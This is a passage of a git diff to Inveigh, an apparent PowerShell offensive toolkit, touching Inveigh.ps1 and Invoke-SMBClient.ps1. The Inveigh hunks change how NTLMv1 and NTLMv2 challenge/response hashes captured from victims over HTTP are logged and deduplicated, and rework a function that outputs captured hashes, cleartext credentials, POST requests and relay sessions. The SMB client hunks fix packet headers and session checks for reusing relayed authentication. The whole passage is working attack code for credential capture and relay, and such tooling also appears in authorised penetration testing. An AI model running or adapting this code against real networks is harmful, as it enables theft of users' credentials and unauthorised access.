($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1977,6 +1985,7 @@ $HTTP_scriptblock = $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes + $HTTP_username_full = $HTTP_NTLM_domain_string + "\" + $HTTP_NTLM_user_string if($HTTP_NTLM_length -eq 24) # NTLMv1 { @@ -1988,24 +1997,24 @@ $HTTP_scriptblock = { $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash) > $null - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash) $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) > $null } - if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null + $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -2021,24 +2030,24 @@ $HTTP_scriptblock = { $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash) > $null - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full")) { $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash") > $null } else { - $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") > $null + $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_username_full [not unique]") > $null } - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) + if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full"))) { $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash) $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) > $null } - if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_username_full") { - $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") > $null + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_username_full") > $null } } @@ -3413,13 +3422,9 @@ $control_scriptblock = function OutputQueueLoop { - while($inveigh.output_queue.Count -gt 0) + while($inveigh.output_queue.Count -gt 0 -and !$inveigh.output_pause) { - - if($inveigh.console_output) - { - $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null - } + $inveigh.console_queue.Add($inveigh.output_queue[0]) > $null if($inveigh.file_output) { @@ -3618,7 +3623,7 @@ $control_scriptblock = # Begin Startup Functions # HTTP Listener Startup Function -function HTTPListener() +function HTTPListener { $proxy_listener = $false $HTTPS_listener = $false @@ -3641,7 +3646,7 @@ function HTTPListener() Start-Sleep -m 50 # HTTPS Listener Startup Function -function HTTPSListener() +function HTTPSListener { $proxy_listener = $false $HTTPS_listener = $true @@ -3664,7 +3669,7 @@ function HTTPSListener() Start-Sleep -m 50 # Proxy Listener Startup Function -function ProxyListener() +function ProxyListener { $proxy_listener = $true $HTTPS_listener = $false @@ -3685,7 +3690,7 @@ function ProxyListener() } # Sniffer/Spoofer Startup Function -function SnifferSpoofer() +function SnifferSpoofer { if($inveigh.DNS) @@ -3720,7 +3725,7 @@ function SnifferSpoofer() } # Unprivileged LLMNR Spoofer Startup Function -function LLMNRSpoofer() +function LLMNRSpoofer { if($inveigh.DNS) @@ -3751,7 +3756,7 @@ function LLMNRSpoofer() } # Unprivileged mDNS Spoofer Startup Function -function mDNSSpoofer() +function mDNSSpoofer { $mDNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() $mDNS_spoofer_runspace.Open() @@ -3768,7 +3773,7 @@ function mDNSSpoofer() } # Unprivileged NBNS Spoofer Startup Function -function NBNSSpoofer() +function NBNSSpoofer { if($inveigh.DNS) @@ -3799,7 +3804,7 @@ function NBNSSpoofer() } # NBNS Brute Force Spoofer Startup Function -function NBNSBruteForceSpoofer() +function NBNSBruteForceSpoofer { $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() $NBNS_bruteforce_spoofer_runspace.Open() @@ -3814,7 +3819,7 @@ function NBNSBruteForceSpoofer() } # Control Loop Startup Function -function ControlLoop() +function ControlLoop { if($inveigh.DNS) { @@ -4327,214 +4332,204 @@ Get captured POST requests. .PARAMETER POSTRequestUnique Get unique captured POST request. -#> - -[CmdletBinding()] -param -( - [parameter(Mandatory=$false)][Switch]$Cleartext, - [parameter(Mandatory=$false)][Switch]$CleartextUnique, - [parameter(Mandatory=$false)][Switch]$Console, - [parameter(Mandatory=$false)][Switch]$DNS, - [parameter(Mandatory=$false)][Switch]$DNSFailed, - [parameter(Mandatory=$false)][Switch]$Learning, - [parameter(Mandatory=$false)][Switch]$Log, - [parameter(Mandatory=$false)][Switch]$NTLMv1, - [parameter(Mandatory=$false)][Switch]$NTLMv2, - [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, - [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, - [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, - [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, - [parameter(Mandatory=$false)][Switch]$POSTRequest, - [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, - [parameter(Mandatory=$false)][Switch]$Session, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) -if($Console -or $PSBoundParameters.Count -eq 0) -{ +.PARAMETER Session +Get relay session list. +#> - while($inveigh.console_queue.Count -gt 0) + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$DNS, + [parameter(Mandatory=$false)][Switch]$DNSFailed, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$POSTRequest, + [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, + [parameter(Mandatory=$false)][Switch]$Session, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter + ) + + if($Console -or $PSBoundParameters.Count -eq 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveAt(0) - } - else + while($inveigh.console_queue.Count -gt 0) { - switch -wildcard ($inveigh.console_queue[0]) + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else { - {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + switch -wildcard ($inveigh.console_queue[0]) { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) - } - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveAt(0) + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + } } - + } - - } - -} -if($DNS) -{ + } - foreach($DNS in $inveigh.DNS_list) + if($DNS) { - - if($DNS.StartsWith("1,")) + + foreach($DNS in $inveigh.DNS_list) { - Write-Output $DNS.Substring(2) + + if($DNS.StartsWith("1,")) + { + Write-Output $DNS.Substring(2) + } + } } -} - -if($DNSFailed) -{ - - foreach($DNS in $inveigh.DNS_list) + if($DNSFailed) { - - if($DNS.StartsWith("0,")) + + foreach($DNS in $inveigh.DNS_list) { - Write-Output $DNS.Substring(2) + + if($DNS.StartsWith("0,")) + { + Write-Output $DNS.Substring(2) + } + } } -} - -if($Log) -{ - Write-Output $inveigh.log -} - -if($NTLMv1) -{ - Write-Output $inveigh.NTLMv1_list -} + if($Log) + { + Write-Output $inveigh.log + } -if($NTLMv1Unique) -{ - $inveigh.NTLMv1_list.Sort() + if($NTLMv1) + { + Write-Output $inveigh.NTLMv1_list + } - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + if($NTLMv1Unique) { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + $inveigh.NTLMv1_list.Sort() - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) { - Write-Output $unique_NTLMv1 - } + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output $unique_NTLMv1 + } -} + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } -if($NTLMv1Usernames) -{ - Write-Output $inveigh.NTLMv2_username_list -} + } -if($NTLMv2) -{ - Write-Output $inveigh.NTLMv2_list -} + if($NTLMv1Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } -if($NTLMv2Unique) -{ - $inveigh.NTLMv2_list.Sort() + if($NTLMv2) + { + Write-Output $inveigh.NTLMv2_list + } - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + if($NTLMv2Unique) { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + $inveigh.NTLMv2_list.Sort() - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) { - Write-Output $unique_NTLMv2 - } + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } -} + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } -if($NTLMv2Usernames) -{ - Write-Output $inveigh.NTLMv2_username_list -} + } -if($Cleartext) -{ - Write-Output $inveigh.cleartext_list -} + if($NTLMv2Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } -if($CleartextUnique) -{ - Write-Output $inveigh.cleartext_list | Get-Unique -} + if($Cleartext) + { + Write-Output $inveigh.cleartext_list + } -if($POSTRequest) -{ - Write-Output $inveigh.POST_request_list -} + if($CleartextUnique) + { + Write-Output $inveigh.cleartext_list | Get-Unique + } -if($POSTRequestUnique) -{ - Write-Output $inveigh.POST_request_list | Get-Unique -} + if($POSTRequest) + { + Write-Output $inveigh.POST_request_list + } -if($Learning) -{ - Write-Output $inveigh.valid_host_list -} + if($POSTRequestUnique) + { + Write-Output $inveigh.POST_request_list | Get-Unique + } -if($Session) -{ - $i = 1 - $session_list = @() + if($Learning) + { + Write-Output $inveigh.valid_host_list + } - while($i -le $inveigh.session_socket_table.Count) + if($Session) { + $i = 0 - if($inveigh.session_socket_table[$i].Connected) - { - $status = "connected" - } - else + while($i -lt $inveigh.session_socket_table.Count) { - $status = "disconnected" + + if(!$inveigh.session_socket_table[$i].Connected) + { + $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"} + } + + $i++ } - $session_object = New-Object PSObject - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Session $i - Add-Member -InputObject $session_object -MemberType NoteProperty -Name System $inveigh.session_socket_table[$i].Client.RemoteEndpoint.Address.IPaddressToString - Add-Member -InputObject $session_object -MemberType NoteProperty -Name User $inveigh.session_user_table[$i] - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Admin $inveigh.session_privilege_table[$i] - Add-Member -InputObject $session_object -MemberType NoteProperty -Name Status $status - Add-Member -InputObject $session_object -MemberType NoteProperty -Name "Last Activity" $inveigh.session_timestamp_table[$i] - $session_list += $session_object - $i++ + Write-Output $inveigh.session_list | Format-Table -AutoSize } - Write-Output $session_list | Format-Table -AutoSize -} - } function Watch-Inveigh diff --git a/Invoke-SMBClient.ps1 b/Invoke-SMBClient.ps1 index 1db92e5..367969d 100644 --- a/Invoke-SMBClient.ps1 +++ b/Invoke-SMBClient.ps1 @@ -156,6 +156,8 @@ function New-PacketSMBHeader { param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID) + $packet_process_ID = $packet_process_ID[0,1] + $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary $packet_SMBHeader.Add("Protocol",[Byte[]](0xff,0x53,0x4d,0x42)) $packet_SMBHeader.Add("Command",$packet_command) @@ -209,7 +211,7 @@ function New-PacketSMBNegotiateProtocolRequest function New-PacketSMB2Header { - param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) + param([Byte[]]$packet_command,[Byte[]]$packet_credit_request,[Int]$packet_message_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 @@ -224,7 +226,7 @@ function New-PacketSMB2Header $packet_SMB2Header.Add("Flags",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) $packet_SMB2Header.Add("MessageID",$packet_message_ID) - $packet_SMB2Header.Add("ProcessID",[Byte[]](0x00,0x00,0x00,0x00)) + $packet_SMB2Header.Add("ProcessID",$packet_process_ID) $packet_SMB2Header.Add("TreeID",$packet_tree_ID) $packet_SMB2Header.Add("SessionID",$packet_session_ID) $packet_SMB2Header.Add("Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) @@ -746,15 +748,20 @@ elseif($Source -is [String]) [String]$session_string = $session -if($session_string -and !$Inveigh -or !$inveigh.session_socket_table[$session]) -{ - Write-Output "[-] Inveigh Relay session not found" - $startup_error = $true -} -elseif($session_string -and !$inveigh.session_socket_table[$session].Connected) +if($session_string) { - Write-Output "[-] Inveigh Relay session not connected" - $startup_error = $true + + if(!$Inveigh -or !$inveigh.session_socket_table[$session]) + { + Write-Output "[-] Inveigh Relay session not found" + $startup_error = $true + } + elseif(!$inveigh.session_socket_table[$session].Connected) + { + Write-Output "[-] Inveigh Relay session not connected" + $startup_error = $true + } + } $destination = $Destination.Replace('.\','') @@ -775,8 +782,7 @@ else $process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id $process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID)) -#[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} -[Byte[]]$process_ID_bytes = 0x00,0x00,0x00,0x00 +[Byte[]]$process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} if(!$session_string_string) { @@ -997,7 +1003,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'NegotiateSMB' { - $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes[0,1] 0x00,0x00 + $packet_SMB_header = New-PacketSMBHeader 0x72 0x18 0x01,0x48 0xff,0xff $process_ID_bytes 0x00,0x00 $packet_SMB_data = New-PacketSMBNegotiateProtocolRequest $SMB_version $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data @@ -1042,8 +1048,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB2_tree_ID = 0x00,0x00,0x00,0x00 $SMB_session_ID = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 $SMB2_message_ID = 1 - $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x00,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_data = New-PacketSMB2NegotiateProtocolRequest $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data @@ -1058,9 +1063,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'NTLMSSPNegotiate' { - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_negotiate = New-PacketNTLMSSPNegotiate $SMB_negotiate_flags $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_negotiate = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_negotiate @@ -1173,9 +1177,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + $NTLMv2_response - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x01,0x00 0x00,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_NTLMSSP_auth = New-PacketNTLMSSPAuth $NTLMSSP_response $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header $NTLMSSP_auth = ConvertFrom-PacketOrderedDictionary $packet_NTLMSSP_auth @@ -1240,8 +1243,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeConnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x03,0x00 0x1f,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1354,8 +1356,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_ioctl_path = "\" + $Target + "\" + $Share $SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00 $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1388,8 +1389,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1686,8 +1686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'QueryInfoRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["NextCommand"] = $header_next_command if($SMB_signing) @@ -1709,8 +1708,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1859,8 +1857,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'SetInfoRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1920,8 +1917,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'CreateRequestFindRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -1947,8 +1943,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00 if($SMB_signing) @@ -1974,8 +1969,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2c_header["ProcessID"] = $process_ID_bytes + $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2229,8 +2223,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table { $SMB_file_ID = $SMB_client_receive[132..147] $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2_header["ProcessID"] = $process_ID_bytes + $packet_SMB2_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["NextCommand"] = 0x68,0x00,0x00,0x00 if($SMB_signing) @@ -2252,8 +2245,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID - $packet_SMB2b_header["ProcessID"] = $process_ID_bytes + $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2322,8 +2314,8 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table $SMB_file_ID = $SMB_client_receive[132..147] } - $SMB2_message_ID ++ - $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $SMB2_message_ID++ + $packet_SMB2_header = New-PacketSMB2Header 0x06,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2443,7 +2435,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'ReadRequest' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["CreditCharge"] = 0x01,0x00 if($SMB_signing) @@ -2576,7 +2568,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table } $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID $packet_SMB2_header["CreditCharge"] = 0x01,0x00 if($SMB_signing) @@ -2653,7 +2645,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'TreeDisconnect' { $SMB2_message_ID++ - $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB2_message_ID $process_ID_bytes $SMB2_tree_ID $SMB_session_ID if($SMB_signing) { @@ -2694,7 +2686,7 @@ if($SMB_client.Connected -or (!$startup_error -and $inveigh.session_socket_table 'Logoff' { $SMB2_message_ID += 20 - $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x7f,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID + $packet_SMB2_header = New-PacketSMB2Header 0x02,0x00 0x01,0x00 